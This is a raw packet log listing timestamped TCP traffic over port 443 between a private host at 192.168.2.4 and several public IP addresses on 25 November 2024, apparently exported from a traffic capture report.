                                                                                                                    Nov 25, 2024 19:52:39.990930080 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.990978003 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.991267920 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.991278887 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:40.140161037 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:40.140188932 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:40.140254974 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:40.140470028 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:40.140481949 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.351756096 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.399560928 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.437952995 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.437958956 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.438900948 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.438987017 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.442821026 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.442878008 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.443389893 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.443396091 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.496846914 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.783458948 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783512115 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783533096 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783565044 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783586979 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.783590078 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783601046 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.783628941 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.783642054 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.791850090 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.800364017 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.800421953 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.800431013 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.809305906 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.809355974 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.809361935 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.853492022 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.853497982 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.900655985 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.907040119 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.947598934 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.975425005 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.979578018 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.979629040 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.979634047 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.987664938 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.987715960 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.987726927 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.995826006 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:41.995883942 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:41.995888948 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.003901005 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.003947973 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.003953934 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.011761904 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.011816025 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.011818886 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.056341887 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.056345940 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070626974 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070633888 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070672035 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070687056 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070689917 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.070696115 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070708036 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070724010 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.070730925 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.070750952 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.120152950 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.192254066 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192262888 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192286968 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192295074 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192312002 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192312002 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.192322016 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.192378998 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.216831923 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.216839075 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.216865063 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.216873884 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.216895103 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.216901064 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.216942072 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.232331991 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.232338905 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.232388973 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.232399940 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.232439995 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.232707977 CET49798443192.168.2.4151.101.130.137
                                                                                                                    Nov 25, 2024 19:52:42.232717037 CET44349798151.101.130.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.381669044 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:42.381704092 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.381763935 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:42.382288933 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:42.382302046 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.430032969 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:42.430052996 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.430377960 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:42.430593014 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:42.430604935 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.594944954 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.599021912 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:43.599041939 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.599910021 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.600085020 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:43.600534916 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:43.600534916 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:43.600585938 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.643017054 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:43.643024921 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:43.699126005 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.030024052 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.084044933 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.153701067 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153708935 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153784037 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153822899 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.153830051 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153857946 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153871059 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.153883934 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.153888941 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.153922081 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.154270887 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.266716003 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.266724110 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.266784906 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.266798019 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.266823053 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.266844988 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.266858101 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.266875029 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.266964912 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.317563057 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.317583084 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.317625046 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.317631006 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.317658901 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.317679882 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.401026964 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.401221037 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.401242018 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.401546955 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.401557922 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.401608944 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.401613951 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.401659966 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.402139902 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.403009892 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.403062105 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.403152943 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.403158903 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.441004992 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.441020966 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.441090107 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.441097975 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.441140890 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.445389032 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:44.469971895 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.469985962 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.470046997 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.470057964 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.470101118 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.482261896 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.482314110 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.482321024 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.482356071 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.482744932 CET49799443192.168.2.4151.101.66.137
                                                                                                                    Nov 25, 2024 19:52:44.482753992 CET44349799151.101.66.137192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.625330925 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.625386953 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:44.625442982 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:45.505948067 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.509875059 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.510004997 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.510025978 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.521555901 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.521774054 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.521780968 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.531276941 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.531529903 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.531536102 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.544011116 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.544169903 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.544174910 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.557703972 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.557854891 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.557859898 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.567265034 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.567368984 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.567373991 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.606806040 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:45.606822968 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.620551109 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.627012014 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.631963015 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.632075071 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.632080078 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.685528994 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.685534954 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.706950903 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.707696915 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.707700968 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.718131065 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.718200922 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.718205929 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.724512100 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.724895954 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.724900961 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.729456902 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.729530096 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.729533911 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.742675066 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.742752075 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.742755890 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.755784035 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.755850077 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.755855083 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.768898964 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.768997908 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.769002914 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.782962084 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.783094883 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.783099890 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.796354055 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.796562910 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.796567917 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.809223890 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.809295893 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.809300900 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.821079016 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.821145058 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.821150064 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.833503008 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.833579063 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.833584070 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.844786882 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.844862938 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.844871044 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.856549978 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.856822014 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.856826067 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.881660938 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.881845951 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.881851912 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.885915041 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.886037111 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.886042118 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.894279957 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.894412041 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.894416094 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.910657883 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.910739899 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.910862923 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.910868883 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.912893057 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.913908005 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.919123888 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.919234037 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.919239044 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.936397076 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.936570883 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.936574936 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.939001083 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.939179897 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.939335108 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.939338923 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.939551115 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.944236040 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.948837042 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.948975086 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.948978901 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.952752113 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.952902079 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.956943035 CET49801443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:45.956953049 CET44349801142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.970741034 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:46.011334896 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.384705067 CET49802443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.384733915 CET44349802142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.385092974 CET49802443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.385107994 CET49803443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.385123968 CET44349803142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.385180950 CET49803443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.385509014 CET49802443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.385523081 CET44349802142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.385751963 CET49803443192.168.2.4142.250.181.65
                                                                                                                    Nov 25, 2024 19:52:46.385766983 CET44349803142.250.181.65192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.800447941 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.800503016 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.800585032 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:46.802227974 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:46.802232981 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.940043926 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:46.940140963 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.940212965 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:46.940493107 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:46.940530062 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.161393881 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.161767006 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:48.161812067 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.162688971 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.162962914 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:48.164170027 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:48.164170027 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:48.164203882 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.164252996 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.211170912 CET49804443192.168.2.435.190.80.1
                                                                                                                    Nov 25, 2024 19:52:48.211188078 CET4434980435.190.80.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.257875919 CET49804443192.168.2.435.190.80.1
